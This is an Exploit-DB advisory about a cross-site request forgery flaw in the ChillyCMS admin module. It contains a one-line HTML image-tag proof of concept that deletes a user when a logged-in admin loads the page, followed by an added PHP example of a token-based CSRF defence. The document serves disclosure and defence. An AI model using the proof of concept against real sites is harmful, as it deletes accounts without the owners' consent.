ChillyCMS – Cross-Site Request Forgery

  • Author: pratul agrawal
    Date: 2010-03-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11781/
  • =======================================================================
     
    chilly_CMS CSRF Vulnerability
     
    =======================================================================
     
    
     
     
     
    # Vulnerability found in: Admin module
     
    # Email: Pratulag@yahoo.com
     
    # Company: aksitservices
     
    # Credit: Pratul Agrawal
     
    # Software: chilly_CMS
    
    # Category: CMS / Portals
    
    # Platform: php
    
    # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
    
     
     
    # Proof of concept #
     
     
     Script to delete the admin user through cross-site request forgery
     
     .................................................................................................................
     
    <html>
    <body>
    <img src="http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID]" />
    </body>
    </html>
     
     ...................................................................................................................
     
     
     
    After the page is executed, refresh the admin page and you can see that the user has been deleted automatically.
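    The PoC works because the delete action is reachable by a plain GET that carries nothing but the victim's session cookie, so any page the logged-in admin visits can trigger it. The following handler, added here as an illustration and not taken from ChillyCMS, shows the synchronizer-token fix: the action only accepts POST, the request must carry a per-session token that a foreign origin cannot read, and the session cookie is marked SameSite. The parameter names action and id follow the advisory; the delete_user() function and file layout are assumed.

```php
<?php
// Added example (not ChillyCMS code): CSRF-protected "delete user" action.
declare(strict_types=1);

// Defence in depth: a SameSite=Lax session cookie is not sent on cross-site
// top-level GETs or on any cross-site subrequest such as an <img>.
// 'secure' => true assumes the site is served over HTTPS.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax', 'secure' => true]);
session_start();

// One random token per session, stored server-side and embedded in forms.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_valid(?string $submitted): bool
{
    return isset($_SESSION['csrf_token'])
        && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Assumed application function; the real deletion logic lives elsewhere.
function delete_user(int $id): void
{
    // e.g. prepared DELETE statement keyed on $id
}

// Only POST reaches the state change, so the <img src=...> PoC (a GET) is
// rejected before any token check; the token then blocks auto-submitted forms.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] ?? '') === 'deleteuser') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $id = filter_var($_POST['id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false) {
        http_response_code(400);
        exit('Bad user id');
    }
    delete_user($id);
    header('Location: usersgroups.site.php', true, 303);
    exit;
}
?>
<!-- Confirmation form: the token travels in the POST body, never in a URL -->
<form method="post" action="usersgroups.site.php">
  <input type="hidden" name="action" value="deleteuser">
  <input type="hidden" name="id"
         value="<?= htmlspecialchars((string)($_GET['id'] ?? ''), ENT_QUOTES) ?>">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <button type="submit">Delete user</button>
</form>
```

    The same pattern applies to every other state-changing admin action: a GET that links to the confirmation form is harmless, while the form's POST is the only request that mutates data, and it is tied to a token the attacker's page cannot obtain.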
    
    
    #If you have any questions, comments, or concerns, feel free to contact me.